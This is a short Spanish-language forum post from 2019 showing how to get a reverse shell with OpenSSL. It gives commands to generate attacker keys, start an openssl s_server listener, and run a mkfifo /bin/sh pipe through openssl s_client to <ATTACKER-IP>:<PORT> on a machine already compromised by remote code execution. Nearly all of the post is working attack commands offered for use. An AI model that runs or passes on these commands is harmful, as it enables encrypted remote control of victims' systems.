Página 1 de 1

Reverse shell con OpenSSL

Publicado: Jue Feb 21, 2019 3:55 pm
por jesseshl
Se pueden conseguir shell con netcat, php, perl, .net, lolbins, etc. etc, pero con OpenSSL? Me refiero al openssl que usamos para secuestrar el archivo ocultos, sí el openssl que usa casi todos los https que necesitan lib en su sistema, sí y finalmente la gente de openssl usa para generar sus claves, etc., sí, el mismo openssl y puede usarlo para obtener una shell inversa.

Se necesita tener privilegio root

Para iniciar el servidor, necesitamos generar claves en el cuadro del atacante

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
Iniciamos en nuestra maquina

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

En la máquina comprometida en la que tiene RCE, ejecute esto ...

Código: [Necesita Registrarse o Iniciar Sesión para ver el enlace]

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s